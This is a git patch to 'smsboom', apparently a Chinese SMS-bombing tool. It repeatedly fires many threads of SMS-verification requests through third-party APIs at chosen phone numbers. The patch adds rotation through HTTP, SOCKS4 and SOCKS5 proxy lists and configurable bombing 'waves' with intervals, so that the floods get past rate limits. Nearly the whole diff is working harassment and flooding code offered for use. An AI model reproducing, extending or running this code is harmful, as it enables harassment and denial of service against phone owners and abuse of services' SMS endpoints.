From e30d3834f52b9941e4c954b7c869da9f80cd0243 Mon Sep 17 00:00:00 2001 From: Weclont Date: Tue, 5 Jul 2022 02:54:16 +0800 Subject: [PATCH] =?UTF-8?q?=F0=9F=92=BE=20Feat:=20=E9=80=82=E9=85=8Dexe.?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit - 修改 smsboom_pyinstall.py, 使编译后的程序适配当前版本功能. - 修复 API Import 错误. --- smsboom.py | 1 - smsboom_pyinstall.py | 163 +++++++++++++++++++++++++++++++++++++------ 2 files changed, 141 insertions(+), 23 deletions(-) diff --git a/smsboom.py b/smsboom.py index e671af4..0c99cf8 100755 --- a/smsboom.py +++ b/smsboom.py @@ -114,7 +114,6 @@ def load_getapi() -> list: def run(thread: int, phone: Union[str, tuple], frequency: int, interval: int, enable_proxy: bool = False): """传入线程数和手机号启动轰炸,支持多手机号""" logger.info(f"手机号:{phone}, 线程数:{thread}, 执行次数:{frequency}, 间隔时间:{interval}") - print(enable_proxy) with ThreadPoolExecutor(max_workers=thread) as pool: try: _api = load_json() diff --git a/smsboom_pyinstall.py b/smsboom_pyinstall.py index 0fa375e..e7b43d8 100755 --- a/smsboom_pyinstall.py +++ b/smsboom_pyinstall.py @@ -11,7 +11,8 @@ from concurrent.futures import ThreadPoolExecutor import time import sys import os -from utils import API, default_header_user_agent +from utils import default_header_user_agent +from utils.models import API # logger config logger.remove() @@ -25,6 +26,44 @@ logger.add( # current directory by pyinstall path = os.path.dirname(os.path.realpath(sys.argv[0])) +def load_proxies() -> list: + """load proxies for files + :return: proxies list + """ + proxy_data = [] + try: + proxy_path = pathlib.Path(path, 'http_proxy.txt') + for line in open(proxy_path): + le = line.replace("\r", "").replace("\n", "") + if le == '': + continue + proxy_one = { + 'all://': 'http://' + le + } + proxy_data.append(proxy_one) + proxy_path = pathlib.Path(path, 'socks4_proxy.txt') + for line in open(proxy_path): + le = line.replace("\r", "").replace("\n", "") + if le == '': + continue + proxy_one = { + 'all://': 'socks4://' + le + } + proxy_data.append(proxy_one) + proxy_path = pathlib.Path(path, 'socks5_proxy.txt') + for line in open(proxy_path): + le = line.replace("\r", "").replace("\n", "") + if le == '': + continue + proxy_one = { + 'all://': 'socks5://' + le + } + proxy_data.append(proxy_one) + except: + logger.error("proxies 加载失败") + return [] + logger.success(f"proxies 加载完成 接口数:{len(proxy_data)}") + return proxy_data def load_json() -> List[API]: """load json for api.json @@ -82,7 +121,33 @@ def reqAPI(api: API, client: httpx.Client) -> httpx.Response: return resp -def req(api: Union[API, str], phone: tuple): +def reqFuncByProxy(api: Union[API, str], phone: Union[tuple, str], proxy: dict) -> bool: + + """通过代理请求接口方法""" + # 多手机号支持 + if isinstance(phone, tuple): + phone_lst = [_ for _ in phone] + else: + phone_lst = [phone] + with httpx.Client(headers=default_header_user_agent(), verify=False, proxies=proxy) as client: + for ph in phone_lst: + try: + if isinstance(api, API): + api = api.handle_API(ph) + resp = reqAPI(api, client) + logger.info(f"{api.desc}-{resp.text[:30]}") + else: + api = api.replace("[phone]", ph).replace(" ", "").replace('\n', '').replace('\r', '') + resp = client.get(url=api, headers=default_header_user_agent()) + logger.info(f"GETAPI接口-{resp.text[:30]}") + return True + except httpx.HTTPError as why: + logger.error(f"请求失败{why}") + return False + + +def reqFunc(api: Union[API, str], phone: Union[tuple, str]) -> bool: + """请求接口方法""" # 多手机号支持 if isinstance(phone, tuple): @@ -97,46 +162,44 @@ def req(api: Union[API, str], phone: tuple): resp = reqAPI(api, client) logger.info(f"{api.desc}-{resp.text[:30]}") else: - api = api.replace("[phone]", ph) + api = api.replace("[phone]", ph).replace(" ", "").replace('\n', '').replace('\r', '') resp = client.get(url=api, headers=default_header_user_agent()) logger.info(f"GETAPI接口-{resp.text[:30]}") + return True except httpx.HTTPError as why: - logger.error(f"{why.request.url}请求失败{why}") - + logger.error(f"请求失败{why}") + return False @click.command() @click.option("--thread", "-t", help="线程数(默认64)", default=64) @click.option("--phone", "-p", help="手机号,可传入多个再使用-p传递", prompt=True, required=True, multiple=True) -@click.option('--super', "-s", is_flag=True, help="循环模式") -@click.option('--interval', "-i", default=60, help="循环间隔时间(默认60s)", type=int) -def run(thread: int, phone: Union[str, tuple], interval: int, super: bool = False): +@click.option('--frequency', "-f", default=1, help="执行次数(默认1次)", type=int) +@click.option('--interval', "-i", default=60, help="间隔时间(默认60s)", type=int) +@click.option('--enable_proxy', "-e", is_flag=True, help="开启代理(默认关闭)", type=bool) +def run(thread: int, phone: Union[str, tuple], frequency: int, interval: int, enable_proxy: bool = False): """传入线程数和手机号启动轰炸,支持多手机号""" - logger.info(f"循环模式:{super},手机号:{phone},线程数:{thread},循环间隔:{interval}") - + logger.info(f"手机号:{phone}, 线程数:{thread}, 执行次数:{frequency}, 间隔时间:{interval}") with ThreadPoolExecutor(max_workers=thread) as pool: try: _api = load_json() _api_get = load_getapi() + _proxies = load_proxies() except ValueError: logger.error("读取接口出错!正在重新下载接口数据!....") update() sys.exit(1) - i = 0 - if super: - while True: - i += 1 - logger.success(f"第{i}波轰炸开始!") + for i in range(1, frequency + 1): + logger.success(f"第{i}波轰炸开始!") + for proxy in _proxies: + logger.success(f"第{i}波轰炸 - 当前正在使用代理:" + + proxy['all://'] + " 进行轰炸...") if enable_proxy else logger.success(f"第{i}波开始轰炸...") + # 不可用的代理或API过多可能会影响轰炸效果 for api in _api: - pool.submit(req, api, phone) + pool.submit(reqFuncByProxy, api, phone, proxy) if enable_proxy else pool.submit(reqFunc, api, phone) for api_get in _api_get: - pool.submit(req, api_get, phone) + pool.submit(reqFuncByProxy, api_get, phone, proxy) if enable_proxy else pool.submit(reqFunc, api_get, phone) logger.success(f"第{i}波轰炸提交结束!休息{interval}s.....") time.sleep(interval) - else: - for api in _api: - pool.submit(req, api, phone) - for api_get in _api_get: - pool.submit(req, api_get, phone) @click.command() @@ -161,6 +224,62 @@ def update(proxy: str): a.write(api_json) logger.success(f"接口更新成功!") +# 原方法 +# @click.command() +# @click.option("--thread", "-t", help="线程数(默认64)", default=64) +# @click.option("--phone", "-p", help="手机号,可传入多个再使用-p传递", prompt=True, required=True, multiple=True) +# @click.option('--super', "-s", is_flag=True, help="循环模式") +# @click.option('--interval', "-i", default=60, help="循环间隔时间(默认60s)", type=int) +# def run(thread: int, phone: Union[str, tuple], interval: int, super: bool = False): +# """传入线程数和手机号启动轰炸,支持多手机号""" +# logger.info(f"循环模式:{super},手机号:{phone},线程数:{thread},循环间隔:{interval}") +# +# with ThreadPoolExecutor(max_workers=thread) as pool: +# try: +# _api = load_json() +# _api_get = load_getapi() +# except ValueError: +# logger.error("读取接口出错!正在重新下载接口数据!....") +# update() +# sys.exit(1) +# i = 0 +# if super: +# while True: +# i += 1 +# logger.success(f"第{i}波轰炸开始!") +# for api in _api: +# pool.submit(req, api, phone) +# for api_get in _api_get: +# pool.submit(req, api_get, phone) +# logger.success(f"第{i}波轰炸提交结束!休息{interval}s.....") +# time.sleep(interval) +# else: +# for api in _api: +# pool.submit(req, api, phone) +# for api_get in _api_get: +# pool.submit(req, api_get, phone) +# +# def req(api: Union[API, str], phone: tuple): +# """请求接口方法""" +# # 多手机号支持 +# if isinstance(phone, tuple): +# phone_lst = [_ for _ in phone] +# else: +# phone_lst = [phone] +# with httpx.Client(headers=default_header_user_agent(), verify=False) as client: +# for ph in phone_lst: +# try: +# if isinstance(api, API): +# api = api.handle_API(ph) +# resp = reqAPI(api, client) +# logger.info(f"{api.desc}-{resp.text[:30]}") +# else: +# api = api.replace("[phone]", ph) +# resp = client.get(url=api, headers=default_header_user_agent()) +# logger.info(f"GETAPI接口-{resp.text[:30]}") +# except httpx.HTTPError as why: +# logger.error(f"{why.request.url}请求失败{why}") + @click.group() def cli():